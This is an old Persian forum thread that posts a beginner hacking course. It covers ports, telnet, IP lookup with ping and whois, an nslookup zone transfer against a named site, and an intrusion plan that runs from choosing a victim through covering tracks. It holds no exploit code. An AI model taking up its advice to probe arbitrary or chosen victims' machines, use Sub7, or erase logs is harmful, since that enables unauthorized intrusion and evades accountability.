مشاهده نسخه کامل
: هک و هکر در Vb
mazi_z_PSP
09-05-2007, 15:15
سلام دوستان خوب. از این به بعد هرچی مطلب در رابطه با هک ميخواين ميتونين اینجا پيدا کنين
mazi_z_PSP
09-05-2007, 15:19
ترمينولوژی (اصطلاحشناسی) - Hacker کيست ؟ هکر کسی است که با سيستم های کامپيوتری آشناست و میتواند با روشهايی خاص (بدون اجازه) وارد آنها شود... اين انسان میتواند خوب يا بد باشد ( در هر حال هکر است) - سوال: يک هکر از چه راهی وارد يک سيستم میشود؟ از راه شبکه (نه بابا( ! بايد توجه کنيد که هر سيستم کامپيوتری (به عبارت بهتر هر سيستم عامل) به هر حال محصول کار تعدادی انسان است و حتما دارای تعدادی) bug خطاهايی که بعد از ارائه محصول به بازار به تدريج کشف میشوند) خواهد بود. بعد از اينکه يک باگ مشخص شد، شرکت ها نرمافزارهايی را بهسرعت (در عرض چند ساعت ) ايجاد میکنند تا مشکل رفع شود اينها را patch میگويند. و بعد مديران شبکه (Wbemasters) در عرض چند روز تا چند سال (آين آخری در مورد ايرانه) آنها را download کرده و مشکل را حل میکنند. در اين فاصله هکرها دمار از روزگار اين سايتها در میاورند... - تعريف چند اصطلاح: *** Hacker واقعی = سامورايی : کسی که هدفش از نفوذ به سيستمها نشان دادن ضعف سيستمهای کامپيوتری است نه سوءاستفاده ... *** Wacker واکر: کسی که هدفش از نفوذ به سيستمها، استفاده از اطلاعات آن سيستمهاست)جرو هکرهای کلاه سياه ( *** Cracker کراکر: کسی که هدفش از نفوذ به سيستمها، خرابکاری و ايجاد اختلال در سيستمهای کامپيوتری است. (جرو هکرهای کلاه سياه( *** Preaker : از قديميترين هکرها هستند که برای کارشان نياز (و دسترسی) به کامپيوتر نداشتند و کارشان نفوذ به خطوط تلفن برای تماس مجانی، استراقسمع و ... بود. اين جزو آموزش من نيست چون کار خيلی بديه تقسيمبندی - انواع کامپيوترهای شبکه: => کامپيوترهای Server : کامپيوترهايی که کارشان تامين اطلاعات در شبکه است، مثلآ کامپيوترهايی که سايتها را نگه میدارند. => کامپبوترهای Client : کامپيوترهايی که استفاده کننده هستند مثل همين کامپيوتر خودتان که داريد ازش کار میکشيد. - انواع سيستم عاملهايی که Server ها از آن استفاده میکنند: => سيستمهای فعلی: * خانواده Unixمثل( FreeBSD , Linux ) * خانواده Windows مثل( WinNT, Win2000 ) * Sun Solaris * OsMac => سيستمهای قديمی (منقرض شده - آخيش ![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] AIX, IRIS, DEC10, DEC20 , ... - سوال: کدامها را بايد ياد گرفت؟ Win2000, Unix(Linux) را بايد ياد بگيريد. پيشنهاد من اين است که Win2000و RedHat Linux را روی کامپيوتر خود همزمان داشته باشيد. Command Prompt چيست؟ در بسياری از درسهای آينده از Command Prompt(خط فرمان) ويندوز استفاده خواهيم کرد. برای باز کردن آن يکی از روشهای زير را به کار بريد: ۱- مسير زير را در ويندوز طی کنيد: Start > Programs > Accessories > Command Prompt ۲- در قسمت Run بنويسيد command يا cmd معرفی چند اصطلاح IP: شماره ايست که به هر کامپيوتر متصل به اينترنت داده میشود تا بتوان بهکمک آن شماره به آن کامپيوترها دسترسی داشت. اين عدد برای کامپيوترهايی که حالت سرور دارند (مثلا سايتها) و نيز کامپيوترهای کلاينتی که معمولا به روشی غير از شمارهگيری (Dial Up) به اينترنت وصل هستند، عددی ثابت و برای ديگران عددی متغير است. مثلا هر بار که شما با شرکت ISP خود تماس گرفته و به اينترنت وصل میشويد، عددی جديد به شما نسبت داده میشود. اين عدد يک عدد ۳۲ بيتی (۴ بايتی) است و برای راحتی بهصورت زير نوشته میشود: xxx.xxx.xxx.xxx که منظور از xxx عددی بين ۰ تا ۲۵۵ است (البته بعضی شمارهها قابل استفاده نيست که بعدا علت را توضيح خواهم داد). مثلا ممکن است آدرس شما به صورت 195.219.176.69 باشد. حتی اسمهايی مثل [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) که برای اتصال استفاده میکنيد، در نهايت بايد به يک IP تبديل شود، تا شما سايت ياهو را ببينيد. در IP معمولا xxx اولی معنای خاصی دارد، که بعدا توضيح میدهم... فقط اين را بگويم که اگر به روش Dial Up به اينترنت وصل شويد، معمولا عددی که به عنوان xxx اول میگيريد، مابين 192 تا 223 خواهد بود.اين توضيح برای تشخيص کامپيوترهای کلاينت از سرور (حداقل در ايران) بسيار میتواند مفيد باشد. بعد از اتصال به اينترنت برای به دست آوردن IP خود، از دستور IPCONFIG در command prompt استفاده کنيد. (البته يک سری نکات فنی داريم که بعدا میگم) پورت (Port): در ساده ترين تعريف، محلی است که دادهها وارد با خارج میشوند. در مبحث هک معمولا با پورتهای نرمافزاری سروکار داريم که به هر کدام عددی نسبت میدهيم. اين اعداد بين ۱ و ۶۵۵۳۵ هستند. معمولا به يک سری از پورتها کار خاصی را نسبت میدهند و بقيه بهصورت پيشفرض برای استفاده شما هستند. پورتهای که فعال هستند، هرکدام توسط يک نرمافزار خاص مديريت میشوند. مثلا پورت ۲۵ برای ارسال Email است، بنابراين بايد توسط يک نرمافزار اين کار انجام شود و اين نرمافزار بر روی پورت ۲۵ منتظر (فالگوش) میماند. اينجا ممکن است شخصی از فلان نرمافزار و ديگری از بهمان نرمافزار استفاده کند ولی بههر حال پورت ۲۵ هميشه برای ارسال Email است. در پايين ليستی از مهمترين پورتها و کاربردشان را میبينيد: Port Num Service Why its phun -------- ------- ---------------------------------------- 7 echo Host repearts what you type 9 discard Dev/null 11 systat Lots of info on users 13 daytime Time and date at computers location 15 netstat Tremendous info on networks 19 chargen Pours out a stream of ASCII characters. 21 ftp Transfers files 23 telnet Where you log in. 25 smpt Forge email 37 time Time 39 rlp Resource location 43 whois Info on hosts and networks 53 domain Nameserver 70 gopher Out-of-date info hunter 79 finger Lots of info on users 80 http Web server 110 pop Incoming email 119 nntp Usenet news groups -- forge posts, cancels 443 shttp Another web server 512 biff Mail notification 513 rlogin Remote login who Remote who and uptime 514 shell Remote command, no password used syslog Remote system logging 520 route Routing information protocol از ميان اين پورتها شمارههای ۷، ۱۵، ۲۱، ۲۳، ۲۵، ۷۹، ۸۰، ۱۱۰و ۱۱۹ فعلا برای ما مهمترند و بهتدريج با آنها آشنا خواهيد شد. چگونه به يک پورت Telnet کنيم؟ برای اينکه عملکرد يک پورت برای شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادی از پورتهايی را که ممکن است اطلاعاتی مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) برای telnet کردن در command prompt دستور زير را تايپ کنيد: telnet hostname portnum در اين دستور بهجای hostname شماره ip و يا نام سايت را وارد میکنيد و بهجای portnum شماره پورت و يا معادل آن از جدول. مثلا برای تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست میدهد در کامپيوتری به اسم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) مينويسيد: telnet iums.ac.ir 13 telnet iums.ac.ir daytime هر دو اين دستورات معادل هم هستند. تلنت کردن معمولا اولين کاری است که يک هکر برای هک کردن يک سايت انجام میدهد، زيرا بعضی از پورتها در صورت بسته نبودن روی آن سرور، معمولا حاوی اطلاعات بسيار مهمی هستند. همين الان شروع کنيد و مثل يک هکر واقعی به کامپبوترهای مختلف و پورتهای گوناگون تلنت کنيد. مخصوصا اگر پورت ۷۹ (finger) روی يک کامپيوتر باز بود، مرا هم خبر کنيد تقسيمبندی انواع حملات اولين نکتهای که لازم است بگويم اينه که وقت خود را برای هک کردن کامپيوترهای کلاينت هدر ندهيد (اگرچه برای افراد مبتدی کار با نرمافزاری مثل Sub7 زياد هم بد نيست ولی نبايد زيادهروی کرد) علت هم اينه که هربار که به اينترنت وصل میشوند ip جديدی به آنها اختصاص پيدا میکنه و زحماتتون هدر میره (البته برای جلوگيری از اين امر هم روشهايی هست که در آينده ايشالله ميگم). حالا تقسيمبندی: ۱- حمله به روش Denial of Service Attack) DoS) ۲- حمله به روش Exploit ۳- حمله به روش Info Gathering (تلنت کردن يکی از مثالهای آن است که امروز آموختيد) ۴- حمله به روش Disinformation ترسيم مسير برای آينده: ۱- اولين و مهمترين تصميم انتخاب نوع کامپيوتری است که میخواهيد هک کنيد ( کلاينت يا سرور )، زيرا روشهک کردن ايندو بجز در مراحل ابتدايی کاملا متفاوت است. ۲- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتری که فلان سايت را نگه میدارد که مثالی برای کامپيوتر سرور است و يا کامپیوتر فلان شخصی که با او چت میکنيد که مثالی برای کامپيوتر کلاينت است) و جمعآوری اطلاعات در مورد آن است. اين جمعآوری اطلاعات از قربانی (Victim) را Footprinting گويند. اولين مشخصهای که بايد کشف شود، ip اوست. يکی ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستمعامل و نيز برنامههايی است که کامپيوتر شخص از آنها بهره میبرد. يکی از مهمترين ( و گاه خطرناکترين) کارها، تستکردن پورتهای آن کامپيوتر برای ديدن اينکه کدام پورتها باز و کدامها بسته هستند. ۳- مرحله بعدی در واقع شروع تلاش برای نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهای سرور روی میدهد، حالتی است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را بهدست آورده و از طريق اين Shell Account به نهايت نفوذ دست يابيم ولی گاه بهدلايل مختلف (مربوط به سطح علمی خود و ... ) نمیتوان به اين سطح دستيافت اما به هر حال برای مرحله بعدی میتواند استفاده شود. اين مرحله جايی است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان میرسد. ۴- اين مرحله بعد از نفوذ روی میدهد که در آن به يک سطحی از کنترل سيستم رسيدهايد. رفتار شما در اين مرحله مشخص میکند که چه نوع هکر هستيد(سامورايی، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشتهايد يا نه، همينجا مشخص خواهد شد. ۵- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضی وقتها برای کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضی از سيستمها آمار login را نگه میدارند که در مورد آنها اين مرحله بسيار مهم است. خلاصه مطالب بالا به اين صورت است: Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning شروع مبحث Footprinting گفتيم که اولين مرحله جمعآوری اطلاعات است که به آن FootPrinting میگويند. اين مبحث را با آموزش روش پيدا کردن ip شروع میکنيم. پيدا کردن ip يک سايت با دانستن آدرس اينترنتی برای اين کار روشهای مختلفی هست: ۱- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعنی Status Bar پس از چند لحظه برای مدت کوتاهی ip نمايش داده میشود و میتوانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است میتوانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرمافزار گرافيکی بعد از باز کردن يک صفحه خالی به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانهای ;-) اگر اين کار را برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) انجام دهيم: که همان شماره ip برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) است. نکته بسيار مهم اين است که بهدليل ضريب اشتباه بسيار بالای آن هيچگاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا. ۲- دستور ping را در command prompt صادر کنيد: ping domain در اين حالت میتوانم ip آن سايت را ملاحظه کنم. (البته کار اصلی ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده میکنيم). مثلا برای پيدا کردن ip سازين مینويسم: ping sazin.com و جواب میشنوم: Pinging sazin.com [63.148.227.65] with 32 bytes of data: Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=821ms TTL=111 Reply from 63.148.227.65: bytes=32 time=822ms TTL=111 Reply from 63.148.227.65: bytes=32 time=811ms TTL=111 Ping statistics for 63.148.227.65: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 811ms, Maximum = 822ms, Average = 818ms ملاحظه میفرماييد که ip سازين 63.148.227.65 است. اگر دستور ping را بهجای sazin.com برای [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) صادر کنيد، جواب همان است. البته برای سايتهای بزرگ جوابهای حاصل متفاوت خواهد بود. ۳- روش بعدی و کاملترين روش whois کردن به بعضی سايتهای خاص است. بعدا اين را کاملتر توضيح میدم ولی فعلا روشش رو میگم. آدرس زير را در مرورگر خود تايپ کنيد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که بهجای xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا برای sazin.com يکی از دو آدرس زير را بايد تايپ کرد: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] چيزی که در صفحه ظاهر میشود به صورت زير است: whois -h magic 63.148.227.65 sazin.com resolves to 63.148.227.65 Trying whois -h whois.arin.net 63.148.227.65 Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1) 63.144.0.0 - 63.151.255.255 Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1) 63.148.224.0 - 63.148.231.255 # ARIN Whois database, last updated 2002-09-04 19:05 # Enter ? for additional hints on searching ARIN"s Whois database. که آدرس ip در سطر اول و دوم ذکر شده است. اگر دو روش آخر را برای سايت بزرگ yahoo انجام دهيم، نتايج زير را میبينيم: --> روش ping : [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ====> 64.58.76.229 yahoo.com ====> 66.218.71.198 --> روش whois : ...و [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) ====> 66.218.71.86 64.58.79.230 و yahoo.com ====> 66.218.71.198 نتايج حاصل گويای آن است که چرا بهتر است از whois استفاده کنيم. RFC چيست ؟ متون بسيار کامل ولی خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث میکنند. اين فايلها به صورت متنی و با پسوند txt هستند و بهعنوان مرجع (برای مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايلها يکبار منتشر شده و هرگز تغيير داده نمیشوند (حتی اگر حاوی اشتباه باشند.) فايلهای RFC از کجا قابل دسترسی هستند؟ RFCها از سايتهای بسياري قابل دسترس هستند ولی سايت مورد علاقه من برای RFCها، سايت زير است: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] که بهجای xxxxxxx نام rfc موردنظر را مینویسيم. مثلا برای دسترسی به rfc791 بايد آدرس را به صورت زير تايپ کنيم: [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
__________________
mazi_z_PSP
12-05-2007, 13:31
ليست مشهورترين RFCها: +General Information RFC1360 IAB Official Protocol Standards RFC1340 Assigned Numbers RFC1208 Glossary of Networking Terms RFC1180 TCP/IP Tutorial RFC1178 Choosing a Name for Your Computer RFC1175 FYI on Where to Start: A Bibliography of Inter-networking Information RFC1173 Responsibilities of Host and Network Managers: A Summary of the Oral Tradition of the Internet RFC1166 Internet Numbers RFC1127 Perspective on the Host Requirements RFCs RFC1123 Requirements for Internet Hosts—Application and Support RFC1122 Requirements for Internet Hosts—Communication Layers RFC1118 Hitchhikers Guide to the Internet RFC1011 Official Internet Protocol RFC1009 Requirements for Internet Gateways RFC980 Protocol Document Order Information +TCP and UDP RFC1072 TCP Extensions for Long-Delay Paths RFC896 Congestion Control in IP/TCP Internetworks RFC879 TCP Maximum Segment Size and Related Topics RFC813 Window and Acknowledgment Strategy in TCP RFC793 Transmission Control Protocol RFC768 User Datagram Protocol +IP and ICMP RFC1219 On the Assignment of Subnet Numbers RFC1112 Host Extensions for IP Multicasting RFC1088 Standard for the Transmission of IP Datagrams over NetBIOS Networks RFC950 Internet Standard Subnetting Procedure RFC932 Subnetwork Addressing Schema RFC922 Broadcasting Internet Datagrams in the Presence of Subnets RFC9l9 Broadcasting Internet Datagrams RFC886 Proposed Standard for Message Header Munging RFC815 IP Datagram Reassembly Algorithms RFC814 Names, Addresses, Ports, and Routes RFC792 Internet Control Message Protocol RFC791 Internet Protocol RFC781 Specification of the Internet Protocol (IP) Timestamp Option +Lower Layers RFC1236 IP to X.121 Address Mapping for DDN RFC1220 Point-to-Point Protocol Extensions for Bridging RFC1209 Transmission of IP Datagrams over the SMDS Service RFC1201 Transmitting IP Traffic over ARCNET Networks RFC1188 Proposed Standard for the Transmission of IP Datagrams over FDDI Networks RFC1172 Point-to-Point Protocol Initial Configuration Options RFC1171 Point-to-Point Protocol for the Transmission of Multiprotocol Datagrams over Point-to-Point Links RFC1149 Standard for the Transmission of IP Datagrams on Avian Carriers RFC1055 Nonstandard for Transmission of IP Datagrams over Serial Lines: SLIP RFC1044 Internet Protocol on Network Systems HYPERchannel: Protocol Specification RFC1042 Standard for the Transmission of IP Datagrams over IEEE 802 Networks RFC1027 Using ARP to Implement Transparent Subnet Gateways RFC903 Reverse Address Resolution Protocol RFC895 Standard for the Transmission of IP Datagrams over Experimental Ethernet Networks RFC894 Standard for the Transmission of IP Datagrams over Ethernet Networks RFC893 Trailer Encapsulations RFC877 Standard for the Transmission of IP Datagrams over Public Data Networks +Bootstrapping RFC1084 BOOTP Vendor Information Extensions RFC951 Bootstrap Protocol RFC906 Bootstrap Loading Using TFTP +Domain Name System RFC1101 DNS Encoding of Network Names and Other Types RFC1035 Domain Names—Implementation and Specification RFC1034 Domain Names—Concepts and Facilities RFC1033 Domain Administrators Operations Guide RFC1032 Domain Administrators Guide RFC974 Mail Routing and the Domain System RFC920 Domain Requirements RFC799 Internet Name Domains +File Transfer and File Access RFC1094 NFS: Network File System Protocol Specification RFC1068 Background File Transfer Program (BFTP) RFC959 File Transfer Protocol RFC949 FTP Unique-Named Store Command RFC783 TFTP Protocol (Revision 2) RFC775 Directory Oriented FTP Commands +Mail RFC1341 MIME (Multipurpose Internet Mail Extensions) Mechanisms for Specifying and Describing the Format of Internet Message Bodies RFC1143 Q Method of Implementing Telnet Option Negotiation RFC1090 SMTP on X.25 RFC1056 PCMAIL: A Distributed Mail System for Personal Computers RFC974 Mail Routing and the Domain System RFC822 Standard for the Format of ARPA Internet Text Messages RFC821 Simple Mail Transfer Protocol +Routing Protocols RFC1267 A Border Gateway Protocol 3 (BGP-3) RFC1247 OSPF version 2 RFC1222 Advancing the NSFNET Routing Architecture RFC1195 Use of OSI IS-IS for Routing in TCP/IP and Dual Environments RFC1164 Application of the Border Gateway Protocol in the Internet RFC1163 Border Gateway Protocol (BGP) RFC1136 Administrative Domains and Routing Domains: A Model for Routing in the Internet RFC1074 NSFNET Backbone SPF-Based Interior Gateway Protocol RFC1058 Routing Information Protocol RFC911 EGP ateway under Berkeley UNIX 4.2 RFC904 Exterior Gateway Protocol Formal Specification RFC888 STUB Exterior Gateway Protocol RFC827 Exterior Gateway Protocol (EGP) RFC823 DARPA Internet Gateway +Routing Performance and Policy RFC1254 Gateway Congestion Control Survey RFC1246 Experience with the OSPF Protocol RFC1245 OSPF Protocol Analysis RFC1125 Policy Requirements for Inter-Administrative Domain Routing RFC1124 Policy Issues in Interconnecting Networks RFC1104 Models of Policy-Based Routing RFC1102 Policy Routing in Internet Protocols +Terminal Access RFC1205 Telnet 5250 Interface RFC1198 FYI on the X Window System RFC1184 Telnet Linemode Option RFC1091 Telnet Terminal-Type Option RFC1080 Telnet Remote Flow Control Option RFC1079 Telnet Terminal Speed Option RFC1073 Telnet Window Size Option RFC1053 Telnet X.3 PAD Option RFC1043 Telnet Data Entry Terminal Option: DODIIS Implementation RFC1041 Telnet 3270 Regime Option RFC1013 X Window System Protocol, version 11: Alpha Update RFC946 Telnet Terminal Location Number Option RFC933 Output Marking Telnet Option RFC885 Telnet End of Record Option RFC861 Telnet Extended Options: List Option RFC860 Telnet Timing Mark Option RFC859 Telnet Status Option RFC858 Telnet Suppress Go Ahead Option RFC857 Telnet Echo Option RFC856 Telnet Binary Transmission RFC855 Telnet Option Specifications RFC854 Telnet Protocol Specification RFC779 Telnet Send-Location Option RFC749 Telnet SUPDUP-Output Option RFC736 Telnet SUPDUP Option RFC732 Telnet Data Entry Terminal Option RFC727 Telnet Logout Option RFC726 Remote Controlled Transmission and Echoing Telnet Option RFC698 Telnet Extended ASCII Option +Other Applications RFC1196 Finger User Information Protocol RFC1179 Line Printer Daemon Protocol RFC1129 Internet Time Synchronization: The Network Time Protocol RFC1119 Network Time Protocol (version 2) Specification and Implementation RFC1057 RPC: Remote Procedure Call Protocol Specification: Version 2 RFC1014 XDR: External Data Representation Standard RFC954 NICNAME/WHOIS RFC868 Time Protocol RFC867 Daytime Protocol RFC866 Active Users RFC865 Quote of the Day Protocol, RFC864 Character Generator Protocol RFC863 Discard Protocol RFC862 Echo Protocol Network Management RFC1271 Remote Network Monitoring Management Information Base RFC1253 OSPE version 2: Management Information Base RFC1243 Appletalk Management Information Base RFC1239 Reassignment of Experimental MIBs to Standard MIBs RFC1238 CLNS MIB for Use with Connectionless Network Protocol (ISO 8473) and End System to Intermediate System (ISO 9542) RFC1233 Definitions of Managed Objects for the DS3 Interface Type RFC1232 Definitions of Managed Objects for the DS1 Interface Type RFC1231 IEEE 802.5 Token Ring MIB RFC1230 IEEE 802.4 Token Bus MIB RFC1229 Extensions to the Generic-Interface MIB RFC1228 SNMP-DPI: Simple Network Management Protocol Distributed Program Interface RFC1227 SNMP MUX protocol and MIB RFC1224 Techniques for Managing Asynchronously Generated Alerts RFC1215 Convention for Defining Traps for Use with the SNMP RFC1214 OSI Internet Management: Management Information Base RFC1213 Management Information Base for Network Management of TCP/IP-based Internets: MiB-II RFC1212 Concise MIB Definitions RFC1187 Bulk Table Retrieval with the SNMP RFC1157 Simple Network Management Protocol (SNMP) RFC1156 Management Information Base for Network Management of TCP/IP-based Internets RFC1155 Structure and Identification of Management Information for TCP/IP-Based Internets RFC1147 FYI on a Network Management Tool Catalog: Tools for Monitoring and Debugging TCP/IP Internets and Interconnected Devices RFC1089 SNMP over Ethernet +Tunneling RFC1241 Scheme for an Internet Encapsulation Protocol: Version 1 RFC1234 Tunneling IPX Traffic through IP Networks RFC1088 Standard for the Transmission of IP Datagrams over NetBIOS Networks RFC1002 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Detailed Specifications RFC1001 Protocol Standard for a NetBIOS Service on a TCP/UDP Transport: Concepts and Methods +OSI RFC1240 OSI Connectionless Transport Services on Top of UDP: Version 1 RFC1237 Guidelines for OSI NSAP Allocation in the Internet RFC1169 Explaining the Role of GOSIP +Security RFC1244 Site Security Handbook RFC1115 Privacy Enhancement for Internet Electronic Mail: Part III Algorithms, Modes, and Identifiers [Draft] RFC1114 Privacy Enhancement for Internet Electronic Mail: Part II Certificate-Based Key Management [Draft] RFC1113 Privacy Enhancement for Internet Electronic Mail: Part I— Message Encipherment and Authentication Procedures [Draft] RFC1108 Security Options for the Internet Protocol +Miscellaneous RFC1251 Whos Who in the Internet: Biographies of IAB, IESG, and IRSG Members RFC1207 FYI on Questions and Answers: Answers to Commonly Asked Experienced Internet User RFC1206 FYI on Questions and Answers: Answers to Commonly Asked New Internet User Questions
mazi_z_PSP
12-05-2007, 13:32
چگونگی استفاده از nslookup وقتی که DNS Server يک سايت را بهدست آورده باشيم (از طريق whois )، به کمک دستور nslookup ميتوان اطلاعاتی اضافی در مورد آن سايت پيدا کرد. طريقه استفاده اين دستور به صورت زير است: فرض کنيد که من میخواهم از Domain Server سايت خودم (far30.com) اطلاعاتی بهدست بيارم. اگر به اين سايت whois کنم، میبينم که دوتا Name Server يا DNS Server دارد: s1.prdev.com s2.prdev.com حالا ديگر آدرس DNS Server مربوط به far30.com را دارم و میتوانم شروع کنم: ۱- دستور nslookup را در command prompt نوشته و اجرا میکنم: C:\>nslookup و نتايج را میبينم: *** Cant find server name for address 192.168.20.3: Non-exi... *** Cant find server name for address 192.168.20.1: Non-exi... *** Default servers are not available Default Server: UnKnown Address: 192.168.20.3 > علامت > يعنی شما میتوانيد دستورات را تايپ کنيد. ۲- در جلوی علامت < دستور زير را تايپ میکنيم: > server dns_server که به جای dns_server بايد آدرس DNS Server سايت موردنظر را بنويسم. پس برای سايت far30.com میشود: > server s1.prdev.com و جواب میشنوم: Default Server: s1.prdev.com Address: 63.148.227.63 اگر در اين مرحله پيغام خطا میگيريد، بايد دوباره اين دستور را تايپ کنيد و نيز میتوانيد از DNS Server دومی که در whois برای far30.com بهدست آورديم ، استفاده کنيم. ۳- دستور زير را تايپ کنيد: > set type=any ۴- حالا به کمک دستور زير اطلاعات را بهدست میآوريم: > ls -d site_name . که برای far30.com میشود: >ls -d far30.com. دقت کنيد که بعد از اسم سايت يک نقطه (dot) گذاشتهام، شما هم بهتر است اينطوری بنويسيد. نتايج زير حاصل میشود: [s1.prdev.com] far30.com. SOA s1.prdev.com admin.prdev.com. (2002070412 3600 600 86400 3600) far30.com. A 63.148.227.65 far30.com. NS s1.prdev.com far30.com. NS s2.prdev.com far30.com. MX 10 mail.far30.com far30.com. MX 15 far30.com ftp CNAME far30.com mail A 63.148.227.65 www CNAME far30.com far30.com. SOA s1.prdev.com admin.prdev.com. (2002070412 3600 600 86400 3600) > بعدا در مورد کاربرد تکتک اينها صحبت خواهم کرد ولی بعضی از آنها همينطوری هم اطلاعات واضحی دارند. ۵- دستور exit را مقابل < تايپ کرده و از nslookup خارج میشويم. شما برای تمرين همين کار را در مورد سايت neda.net.ir انجام دهيد. تقسيمبندی پورتها از روی شماره آنها ۱- پورتهای 0 تا 1023 : مشهورترين پورتها هستند و معمولا هرکدام برای يک سرويس خاص استفاده میشود. با تعدادی از اين پورتها در جلسات قبل آشنا شدهايد. ۲- پورتهای 1024 تا 49151 : اين سری از پورتها مشخصا با هيچيک از سرويسهای اينترنتی مرتبط نيستند بلکه وقتی که با يک ابزار شبکه مانند مرورگر اينترنت(مثل Internet Explore يا Netscape Navigator )، نرمافزار ارسال و دريافت E-mail (مثل Outlook يا Edura )، نرمافزارهای FTP (مثل WS-FTP يا Cute-FTP ) کار میکنيد، يکی از اين پورتها به صورت random باز شده و يک ارتباط با سرور (با توجه بهنوع سرويس اينترنتی که میدهد که يکی از پورتهای 0 تا 1023 است) برقرار شده و دادهها ارسال و دريافت میشوند. يعنی پورت شما يکی از پورتهای اين قسمت است و پورت سرور يکی از پورتهای بالايی.اين سری پورتها را پورتهای register شده هم میگويند. ۳- پورتهای 49152 تا 65535 : اين سری از پورتها بهندرت استفاده میشوند. کاربرد اساسی آنها برای يک سری سرويسهای خاص اينترنتی است و يا توسط trojanها (که برای ---- کردن کامپيوتر است) است. البته خيلی از trojanهای معروف از پورتهای رديف ۲ هم استفاده میکنند و اين تقسيمبندیها هميشه برقرار نيست و بههمين علت است که گاهی پورتها را به دودسته زير 1024 و بالای 1024 تقسيم میکنند. TCP و UDP چيست؟ مدل TCP/IP که برای ارتباط اينترنتی بهکار میرود، میتوان به لايههای مختلفی تقسيمبندی کرد که بعدا بيشتر توضيح میدم، اما يکی از اين لايهها، لايه ارتباط host2host است که خود شامل دو پروتکل است به نامهای TCP و UDP : ۱- (TCP (Transmission Control Protocol : اين پروتکل قویتر و قابل اعتمادتر است و اصولا پروتکل مهمتری نسبت به UDP محسوب میشود. اين پروتکل توانايی بازبينی بستههاو کنترل خطا را هم دارد. ۲- (UDP (User Datagram Protocol : اين پروتکل برای کاهش overflow طراحی شده است و در خيلی از موارد وابسته به TCP است. نکته مهم اين است که وقتی با يک پورت خاص روی يک کامپيوتر ديگر ارتباط برقرار میکنيم، اين ارتباط میتواند از نوع TCP يا UDP باشد. بنابراين وقتی میخواهيم يک کامپيوتر خاصی را از نظر پورتها بررسی کنيم، هردو بايد بررسی شود. معمولترين Scanning ها کدامند؟ دو نوع معمول Scanning وجود دارد: ۱- IP Scanning : فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و میخواهيد بدانيد که در اين لحظه کدامها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه همه را. اين موضوع را بعدا توضيح میدم ( اين کار معمولا موقعی پيش میآيد که قرار است کلاينت هک کنيد و مهم نيست چه کسی باشد ) ۲- Port Scanning : در اين حالت ما IP يا IPهای مورد نظر را انتخاب کردهايم و حالا میخواهيم بدانيم که کدام پورتها روی آن کامپيوترها باز است. اين کار به کمک نرمافزارهای خاصی انجام میشود که مبحث امروز ماست. چگونه يک ارتباط TCP برقرار میشود که بگوييم فلان پورت باز است يا نه؟ برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه 